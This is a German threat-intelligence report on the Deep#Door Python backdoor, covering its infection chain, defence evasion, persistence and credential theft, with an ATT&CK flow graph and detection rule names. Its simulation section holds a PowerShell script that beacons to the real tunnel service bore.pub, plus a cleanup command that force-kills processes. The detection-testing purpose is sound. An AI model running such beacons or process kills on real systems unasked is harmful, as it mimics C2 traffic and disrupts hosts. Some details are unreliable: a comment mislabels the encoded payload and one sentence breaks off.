SOC Prime Bias: Kritisch

04 May 2026 17:21 UTC

Deep#Door Stealer: Heimlicher Python-Backdoor und Anmeldeinformations-Dieb, der Tunneling, mehrschichtige Persistenz und In-Memory-Überwachungsfähigkeiten nutzt

Author Photo
SOC Prime Team linkedin icon Folgen
Deep#Door Stealer: Heimlicher Python-Backdoor und Anmeldeinformations-Dieb, der Tunneling, mehrschichtige Persistenz und In-Memory-Überwachungsfähigkeiten nutzt
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Zusammenfassung

Der Bericht untersucht Deep#Door, eine heimliche, auf Python basierende Backdoor, die über einen verschleierten Batch-Loader geliefert wird, der seine bösartige Nutzlast zur Laufzeit einbettet und rekonstruiert. Die Malware nutzt einen öffentlichen TCP-Tunneldienst für die Steuerungs- und Kontrollkommunikation, richtet mehrere Persistenzmechanismen ein, schwächt Windows-Sicherheitskontrollen und unterstützt umfassende Überwachungs- und Anmeldeinformationsdiebstahlaktivitäten. Außerdem führt sie detaillierte Umweltüberprüfungen durch, um Sandboxes und Analysten zu entgehen, während sie sich auf API-Patching im Arbeitsspeicher verlässt, um während der Ausführung verborgen zu bleiben.

Untersuchung

Securonix Forscher kartierten die gesamte Infektionskette vom initialen Batch-Skript bis zur Nutzlast-Extraktion, Rekonstruktion und Ausführung des finalen Python RAT. Ihre Analyse identifizierte den Missbrauch von bore.pub zum Tunneln, dynamisch generierte Ports und eine benutzerdefinierte Authentifizierungssequenz, die für den Betreiberzugang verwendet wird. Der Bericht enthielt auch eine detaillierte Beschreibung der Methoden zur Umgehung von Verteidigungsmaßnahmen, Persistenztechniken, Systementsdeckungsroutinen und dem Verhalten der Datenexfiltration.

Abmilderung

Verteidiger sollten die Skriptausführung genau überwachen, PowerShell-Protokollierung aktivieren, unerlaubte Änderungen an Microsoft Defender und Firewall-Einstellungen erkennen und Start-Einträge, Run-Schlüssel und zugehörige Persistenzorte überprüfen. Die Netzwerküberwachung sollte sich auch auf ausgehende Verbindungen zu bore.pub und ungewöhnliche Aktivitäten auf hohen Ports konzentrieren. EDR-Tools, die in der Lage sind, API-Patching und Manipulation im Arbeitsspeicher zu erkennen, können die Sichtbarkeit dieser Bedrohung weiter verbessern.

Reaktion

Wenn Deep#Door Aktivität erkannt wird, sollte der betroffene Endpunkt sofort isoliert, der bösartige Python-Prozess beendet, alle Persistenzmechanismen einschließlich Startskripten, Run-Schlüsseln und WMI-Abonnements entfernt und modifizierte Defender- und Protokollierungseinstellungen wiederhergestellt werden. Sicherheitsteams sollten auch eine Speicher- und forensische Analyse durchführen, um versteckte Implantate zu identifizieren und das Ausmaß des Anmeldedaten-Diebstahls zu bewerten, während die Netzwerkkommunikation zu bore.pub.

„graph TB %% Class Definitions Section classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef malware fill:#ff9999 classDef process fill:#ccccff %% Nodes Definitions action_user_execution[„AktionT1204 Benutzerausführung: Opfer führt bösartige Batch-Datei install_obf.bat aus“] class action_user_execution action tool_batch_file[„WerkzeugName: install_obf.bat
Beschreibung: Batch-Skript, das den Loader startet“] class tool_batch_file tool action_obfuscation[„AktionT1027 Verschleierte Dateien oder Informationen: Extrahiert Base64/XOR-codierte Python-Nutzlast (svc.py) über selbstreferenzierende PowerShell-RegEx“] class action_obfuscation action tool_powershell[„WerkzeugName: PowerShell
Beschreibung: Wird verwendet, um die Batch-Datei zu parsen und die eingebettete Nutzlast zu dekodieren“] class tool_powershell tool tool_python[„WerkzeugName: Python
Beschreibung: Führt die dekodierte svc.py-Nutzlast aus“] class tool_python tool action_defense_evasion_disable[„AktionT1562.001 Deaktivieren oder Modifizieren von Werkzeugen / T1562.004 Deaktivieren oder Modifizieren der Systemfirewall / T1562.008 Deaktivieren oder Modifizieren von Cloud-Logs: Deaktiviert Windows Defender, PowerShell-Protokollierung, SmartScreen und Firewall-Protokollierung“] class action_defense_evasion_disable action tool_setmp[„WerkzeugName: Set-MpPreference
Beschreibung: PowerShell-Cmdlet zur Änderung der Defender-Einstellungen“] class tool_setmp tool tool_netsh[„WerkzeugName: netsh advfirewall
Beschreibung: Modifiziert Windows-Firewall-Regeln und -Protokollierung“] class tool_netsh tool action_indicator_removal[„AktionT1070.001 Windows-Ereignisprotokolle löschen und T1070.006 Zeitstempel ändern: Stoppt und löscht EventLog/Sysmon-Dienste und ändert Dateizeitstempel“] class action_indicator_removal action action_persistence_runkey[„AktionT1547.001 Registrierungs-Run-Schlüssel/Autostart-Ordner und T1053 Geplanter Task/Job: Legt SystemServices.vbs im Autostart-Ordner ab, erstellt Run-Schlüssel und eine geplante Task als Fallback“] class action_persistence_runkey action tool_vbs_startup[„WerkzeugName: SystemServices.vbs
Beschreibung: VBS-Skript im %APPDATA%MicrosoftWindowsStartmenüProgrammeAutostart“] class tool_vbs_startup tool action_credential_access[„AktionT1003 Betriebssystem-Anmeldeinformations-Dumping, T1552.004 Private Schlüssel, T1552.001 Anmeldeinformationen in Dateien, T1555 Passwortspeicher, T1555.005 Passwort-Manager: Sammelt Browser-Passwörter, Windows Anmeldeinformations-Manager, SSH-Schlüssel, Cloud-Token“] class action_credential_access action action_collection[„AktionT1056.001 Tastenanschläge aufzeichnen, T1113 Bildschirmaufnahme, T1125 Videoaufnahme, T1123 Audioaufnahme, T1115 Zwischenablage-Daten: Nimmt Tastenanschläge, Bildschirmfotos, Webcam-Videos, Mikrofon-Audio und Zwischenablage auf“] class action_collection action action_discovery[„AktionT1082 System-Informationsentdeckung, T1518 Softwareentdeckung, T1057 Prozessentdeckung, T1046 Netzwerkdienst-Entdeckung, T1018 Fernsystem-Entdeckung, T1526 Cloud-Dienst-Entdeckung: Sammelt Betriebssystem-, Hardware-, Software-, Prozess-, Netzwerk- und Cloud-Konfigurationsdaten“] class action_discovery action action_defense_evasion_reflective[„AktionT1620 Spiegelnde Code-Ausführung und T1497.003 Virtualisierungs-/Sandbox-Evasion: Zeitbasiert: Erkennt Debugger, virtuelle Maschinen und Sandbox-Eigenschaften und bricht die Ausführung ab“] class action_defense_evasion_reflective action action_c2_tunneling[„AktionT1572 Protokoll-Tunneling: Errichtet verschlüsselten Tunnel über öffentlichen Dienst bore.pub, führt dynamisches Port-Scannen und Challenge-Response-Authentifizierung durch“] class action_c2_tunneling action action_exfiltration[„AktionT1041 Exfiltration über C2-Kanal und T1048.002 Exfiltration über alternatives Protokoll: Asymmetrisch verschlüsselt Non-C2: Sendet gesammelte Daten durch den getunnelten Kanal“] class action_exfiltration action action_impact_forkbomb[„AktionT1499.002 Dienstauslastung-Überlastung: Führt eine Gabelbombe aus, um Systemressourcen zu verbrauchen“] class action_impact_forkbomb action %% Connections showing attack flow action_user_execution –>|führt aus| tool_batch_file tool_batch_file –>|enthält| action_obfuscation action_obfuscation –>|verwendet| tool_powershell tool_powershell –>|decodiert und startet| tool_python tool_python –>|führt aus| action_defense_evasion_disable action_defense_evasion_disable –>|verwendet| tool_setmp action_defense_evasion_disable –>|verwendet| tool_netsh action_defense_evasion_disable –>|führt zu| action_indicator_removal action_indicator_removal –>|geht voraus| action_persistence_runkey action_persistence_runkey –>|legt ab| tool_vbs_startup action_persistence_runkey –>|ermöglicht| action_credential_access action_credential_access –>|ermöglicht| action_collection action_collection –>|liefert Daten an| action_discovery action_discovery –>|unterstützt| action_defense_evasion_reflective action_defense_evasion_reflective –>|etabliert| action_c2_tunneling action_c2_tunneling –>|trägt| action_exfiltration action_exfiltration –>|löst aus| action_impact_forkbomb „

Angriffsfluss

Erkennungen

Mögliche Persistenzpunkte [ASEPs – Software/NTUSER Hive] (über registry_event)

SOC Prime Team
01. Mai 2026

Verdächtige PowerShell-Strings (über cmdline)

SOC Prime Team
01. Mai 2026

Verdächtige .NET-Klassen/Methoden-Aufrufe von PowerShell-Befehlszeile (über process_creation)

SOC Prime Team
01. Mai 2026

Mögliche Remote-Systementdeckung oder Verbindungs-Check (über cmdline)

SOC Prime Team
01. Mai 2026

Mögliche Konto- oder Gruppenauflistung/-manipulation (über cmdline)

SOC Prime Team
01. Mai 2026

Mögliche Nutzung von Timeout zur verzögerten Ausführung (über cmdline)

SOC Prime Team
01. Mai 2026

LOLBAS WScript / CScript (über process_creation)

SOC Prime Team
01. Mai 2026

Echtzeit-Überwachung von Windows Defender deaktivieren und andere Einstellungen ändern (über cmdline)

SOC Prime Team
01. Mai 2026

Verdächtige PowerShell-Strings (über powershell)

SOC Prime Team
01. Mai 2026

Verdächtige Änderungen an den Windows Defender-Einstellungen (über powershell)

SOC Prime Team
01. Mai 2026

Verdächtige Binärdateien/Skripte im Autostart-Ort (über file_event)

SOC Prime Team
01. Mai 2026

IOCs (HashSha256) zur Erkennung: Deep#Door Stealer: Heimliche Python-Backdoor und Anmeldeinformations-Hacker, der Tunneling, mehrschichtige Persistenz und Überwachungsfähigkeiten im Arbeitsspeicher nutzt

SOC Prime AI-Regeln
01. Mai 2026

Erkennung von C2-Kommunikation über öffentlichen TCP-Tunneldienst [Windows-Netzwerkverbindung]

SOC Prime AI-Regeln
01. Mai 2026

PowerShell-Befehl zur Extraktion der eingebetteten Python-Nutzlast [Windows PowerShell]

SOC Prime AI-Regeln
01. Mai 2026

Erkennung der Bereitstellung der heimlichen Python-Backdoor Deep#Door [Windows-Prozesserstellung]

SOC Prime AI-Regeln
01. Mai 2026

Erkennung des Einsatzes des TCP-Tunnelingdienstes bore.pub für C2-Kommunikation [Windows-Netzwerkverbindung]

SOC Prime AI-Regeln
01. Mai 2026

Echtzeit- und Verhaltensüberwachung von Windows Defender deaktiviert [Windows PowerShell]

SOC Prime AI-Regeln
01. Mai 2026

Ausführung des verschleierten Batch-Skripts Deep#Door [Windows-Prozesserstellung]

SOC Prime AI-Regeln
01. Mai 2026

PowerShell-Befehl zur Deaktivierung von Windows Defender-Funktionen [Windows PowerShell]

SOC Prime AI-Regeln
01. Mai 2026

Erkennung der Ausführung der heimlichen Python-Backdoor Deep#Door [Windows-Prozesserstellung]

SOC Prime AI-Regeln
01. Mai 2026

Erkennung der heimlichen C2-Kommunikation über bore.pub [Windows-Netzwerkverbindung]

SOC Prime AI-Regeln
01. Mai 2026

Erkennung des Deep#Door-Stealers unter Verwendung von PowerShell und Firewall-Manipulation [Windows PowerShell]

SOC Prime AI-Regeln
01. Mai 2026

Simulationsausführung

Voraussetzung: Der Telemetrie- und Basislinien-Vorflugtest muss bestanden sein.

Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der Adversary-Technik (TTP), die zur Auslösung der Erkennungsregel ausgelegt ist. Die Befehle und Erzählungen MÜSSEN die identifizierten TTPs direkt widerspiegeln und darauf abzielen, genau die Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird.

  • Angriffs-Erzählung & Befehle:

    Ein Angreifer, der auf dem Windows-Host mit niedrigen Privilegien Fuß gefasst hat, möchte einen heimlichen C2-Kanal über die öffentlich bekannte bore.pub vom Deep#Door genutzte Tunneldienst einrichten. Um sich mit legitimen Datenverkehr zu vermischen, wählt der Angreifer einen Port aus dem Bereich 41.234-41.243 (vom Malware ausgewählt) und verwendet PowerShell’s System.Net.Sockets.TcpClient Klasse, um eine rohe TCP-Verbindung zu öffnen. Die Verbindung wird für kurze Zeit im Leerlauf gehalten, um einen Herzschlag zu simulieren, bevor ein kleines base-64-codiertes Beacon übertragen wird.

  • Regressionstest-Skript:

    # Simuliere Deep#Door C2-Beacon zu bore.pub auf einem zufälligen Port innerhalb des überwachten Bereichs
    $domain = 'bore.pub'
    $port = Get-Random -Minimum 41234 -Maximum 41244 # Obergrenze ist exklusiv
    try {
        Write-Host "Verbindung zu $domain:$port wird aufgebaut ..."
        $client = New-Object System.Net.Sockets.TcpClient
        $client.Connect($domain, $port)
        $stream = $client.GetStream()
    
        # Minimaler Beacon-Nutzlast (z.B., ein base64-codiertes "ping")
        $payload = [System.Text.Encoding]::ASCII.GetBytes('cGlja2V0')
        $stream.Write($payload,0,$payload.Length)
        Write-Host "Beacon gesendet. Verbindung wird für 5 Sekunden gehalten..."
        Start-Sleep -Seconds 5
    }
    catch {
        Write-Error "Verbindung fehlgeschlagen: $_"
    }
    finally {
        if ($stream) { $stream.Close() }
        if ($client) { $client.Close() }
        Write-Host "Verbindung geschlossen."
    }
  • Aufräum-Befehle:

    # Keine persistierenden Artefakte; sicherstellen, dass keine verbleibenden TCP-Verbindungen bestehen
    Get-NetTCPConnection -RemotePort 41234-41243 -State Established | ForEach-Object {
        Stop-Process -Id $_.OwningProcess -Force
    }
    Write-Host "Aufräumen abgeschlossen."

Ende des Berichts